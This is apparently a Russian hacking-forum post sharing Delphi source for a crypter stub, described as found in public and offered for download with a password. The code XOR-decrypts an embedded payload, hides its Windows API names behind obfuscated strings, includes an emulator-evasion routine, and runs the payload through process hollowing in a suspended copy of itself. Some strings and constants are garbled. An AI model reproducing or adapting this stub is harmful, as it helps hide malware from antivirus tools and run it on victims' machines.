Вот зто чудо я нашел в паблике



качать тут

Pass antichat

ЗЫ: сами понимаете,что нашел я его в паблике,так что качаете на свой страх и риск!!!

program Stub;

{$IMAGEBASE $44440000}

uses
Windows;

var
z: integer;
_FILE_

var
xorkey, xorkeyconst, xorkeyvar: byte;

type
TSections = array [0..0] of TImageSectionHeader;

function nud_emulator(FileName: string): DWORD;
var
F: file of DWORD;
P: Pointer;
Fsize: DWORD;
Buffer: array [0..500] of DWORD;
begin
FileMode := 0;
AssignFile(F, FileName);
Reset(F);
Seek(F, FileSize(F) div 2);
Fsize := FileSize(F) - 1 - FilePos(F);
if Fsize > 500 then Fsize := 500;
BlockRead(F, Buffer, Fsize);
Close(F);
P := @Buffer;
asm
xor eax, eax
xor ecx, ecx
mov edi , p
@again:
add eax, [edi + 4*ecx]
inc ecx
cmp ecx, fsize
jl @again
mov @result, eax
end;
end;

function encodestr(instr: string): string;
var
i, j: integer;
begin
result := '';
j := 137;
for i := 1 to length(instr) do
begin
result := result + chr(ord(instr[i]) xor j);
if j = 255 then j := 1 else inc(j);
end;
end;

procedure nud_decrypt(var arr: array of byte);
var
i, j: integer;
begin
j := xorkey;
for i := 0 to length(arr) - 1 do
begin
arr[i] := arr[i] xor j xor $32*2;
if j = 255 then j := 1 else inc(j);
end;
end;


function NDSize(sz: dword; al: dword): dword;
begin
if ((sz mod al) = 0) then
begin
Result := sz;
end
else
begin
Result := ((sz div al) + 1) * al;
end;
end;


// winapi

type
DWORD = LongWord;
BOOL = LongBool;
LPCSTR = PAnsiChar;
UINT = LongWord;
FARPROC = Pointer;

PSecurityAttributes = ^TSecurityAttributes;
_SECURITY_ATTRIBUTES = record
nLength: DWORD;
lpSecurityDescriptor: Pointer;
bInheritHandle: BOOL;
end;
TSecurityAttributes = _SECURITY_ATTRIBUTES;
SECURITY_ATTRIBUTES = _SECURITY_ATTRIBUTES;

POverlapped = ^TOverlapped;
_OVERLAPPED = record
Internal: DWORD;
InternalHigh: DWORD;
Offset: DWORD;
OffsetHigh: DWORD;
hEvent: THandle;
end;
{$EXTERNALSYM _OVERLAPPED}
TOverlapped = _OVERLAPPED;
OVERLAPPED = _OVERLAPPED;
{$EXTERNALSYM OVERLAPPED}

const
MAX_PATH = 260;
GENERIC_WRITE = $40000000;
FILE_SHARE_WRITE = $00000002;
CREATE_NEW = 1;
INVALID_HANDLE_VALUE = DWORD(-1);
kernel32 = 'kernel32.dll';


var
nud_mem: function (hProcess: THandle; const lpBaseAddress: Pointer; lpBuffer: Pointer;
nSize: DWORD; var lpNumberOfBytesWritten: DWORD): BOOL; stdcall;
nud_create: function (lpApplicationName: PChar; lpCommandLine: PChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
lpCurrentDirectory: PChar; const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation): BOOL; stdcall;
nud_read: function (hProcess: THandle; const lpBaseAddress: Pointer; lpBuffer: Pointer;
nSize: DWORD; var lpNumberOfBytesRead: DWORD): BOOL; stdcall;
nud_alloc: function (hProcess: THandle; lpAddress: Pointer;
dwSize, flAllocationType: DWORD; flProtect: DWORD): Pointer; stdcall;


function LoadLibrary(lpLibFileName: PChar): HMODULE; stdcall; external kernel32 name 'LoadLibraryA';
function GetProcAddress(hModule: HMODULE; lpProcName: LPCSTR): FARPROC; stdcall; external kernel32 name 'GetProcAddress';
function GetTempPath(nBufferLength: DWORD; lpBuffer: PChar): DWORD; stdcall; external kernel32 name 'GetTempPathA';


procedure stealth;
var
hkernel: thandle;
begin
hkernel := LoadLibrary(pansichar(encodestr('впщвивјў� �цяш')));
@nud_mem := getprocaddress(hkernel, pansichar(encodestr('ЮшвшиЮэятчазШу� �члг')));
@nud_create := getprocaddress(hkernel, pansichar(encodestr('КшонщлЯвюсцзжЧ' )));
@nud_read := getprocaddress(hkernel, pansichar(encodestr('ЫпкиЭьауфбаЩры� �ка')));
@nud_alloc := getprocaddress(hkernel, pansichar(encodestr('ЯгщшшпгСэюьчРо' )));
end;

procedure nud_copy(Destination: Pointer; Source: Pointer; Length: DWORD);
var
i :integer;
begin
i := i + $23 xor 178;
if i = i then
Move(Source^, Destination^, Length);
end;

procedure StartMemory(nf: pointer);
var
BaseAddress, Bytes, HeaderSize, InjectSize, SectionLoop, SectionSize: dword;
Context: TContext;
FileData: pointer;
ImageNtHeaders: PImageNtHeaders;
InjectMemory: pointer;
ProcInfo: TProcessInformation;
PSections: ^TSections;
StartInfo: TStartupInfo;
begin
ImageNtHeaders := pointer(dword(dword(nf)) + dword(PImageDosHeader(nf)._lfanew));
GetMem(InjectMemory, InjectSize);
try
FileData := InjectMemory;
HeaderSize := ImageNtHeaders.OptionalHeader.SizeOfHeaders;
PSections := pointer(pchar(@(ImageNtHeaders.OptionalHeader)) + ImageNtHeaders.FileHeader.SizeOfOptionalHeader);
for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
begin
if PSections[SectionLoop].PointerToRawData < HeaderSize then HeaderSize := PSections[SectionLoop].PointerToRawData;
end;
nud_copy(FileData, nf, HeaderSize);
FileData := pointer(dword(FileData) + NDSize(ImageNtHeaders.OptionalHeader.SizeOfHeaders , ImageNtHeaders.OptionalHeader.SectionAlignment));
for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
begin
if PSections[SectionLoop].SizeOfRawData > 0 then
begin
SectionSize := PSections[SectionLoop].SizeOfRawData;
if SectionSize > PSections[SectionLoop].Misc.VirtualSize then SectionSize := PSections[SectionLoop].Misc.VirtualSize;
nud_copy(FileData, pointer(dword(nf) + PSections[SectionLoop].PointerToRawData), SectionSize);
FileData := pointer(dword(FileData) + NDSize(PSections[SectionLoop].Misc.VirtualSize, ImageNtHeaders.OptionalHeader.SectionAlignment));
end
else
begin
if PSections[SectionLoop].Misc.VirtualSize <> 0 then FileData := pointer(dword(FileData) + NDSize(PSections[SectionLoop].Misc.VirtualSize, ImageNtHeaders.OptionalHeader.SectionAlignment));
end;
end;
stealth;
ZeroMemory(@StartInfo, SizeOf(StartupInfo));
ZeroMemory(@Context, SizeOf(TContext));
nud_create(nil, pchar(ParamStr(0)), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
Context.ContextFlags := CONTEXT_FULL;
GetThreadContext(ProcInfo.hThread, Context);
nud_read(ProcInfo.hProcess, pointer(Context.Ebx + 8), @BaseAddress, 4, Bytes);
nud_alloc(ProcInfo.hProcess, pointer(ImageNtHeaders.OptionalHeader.ImageBase), InjectSize, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE);
nud_mem(ProcInfo.hProcess, pointer(ImageNtHeaders.OptionalHeader.ImageBase), InjectMemory, InjectSize, Bytes);
nud_mem(ProcInfo.hProcess, pointer(Context.Ebx + 8), @ImageNtHeaders.OptionalHeader.ImageBase, 4, Bytes);
Context.Eax := ImageNtHeaders.OptionalHeader.ImageBase + ImageNtHeaders.OptionalHeader.AddressOfEntryPoint;
SetThreadContext(ProcInfo.hThread, Context);
ResumeThread(ProcInfo.hThread);
finally
FreeMemory(InjectMemory);
end;
end;
procedure nud_loader;
var
tmb: array [0..MAX_PATH] of char;
begin
gettemppath(MAX_PATH, tmb);
xorkeyconst := ord(tmb[2]) + ord(tmb[3]);
xorkeyvar := _XORKEYVAR_ + z - z; //Decrypting Key
xorkey := xorkeyconst xor xorkeyvar;
nud_decrypt(ff);
if @ff[0] <> nil then
StartMemory(@ff[0]);
end;


function GetWnd(var S: String): Boolean;
var
Len: Integer;
begin
Len := Windows.GetWindowsDirectory(nil, 0);
if Len > 0 then
begin
SetLength(S, Len);
Len := Windows.GetWindowsDirectory(PChar(S), Len);
SetLength(S, Len);
Result := Len > 0;
end else
Result := False;
end;

var
FSize: DWORD;
DestHFile: THandle;
DestFile : string;
st: string;
begin
DestFile := encodestr('c:\0000001.dat');
DestHFile := CreateFile(pchar(DestFile),GENERIC_WRITE,FILE_SHAR E_READ,nil,CREATE_ALWAYS,0,0);
FSize:=GetFileSize(DestHFile,nil);
nud_loader;
end.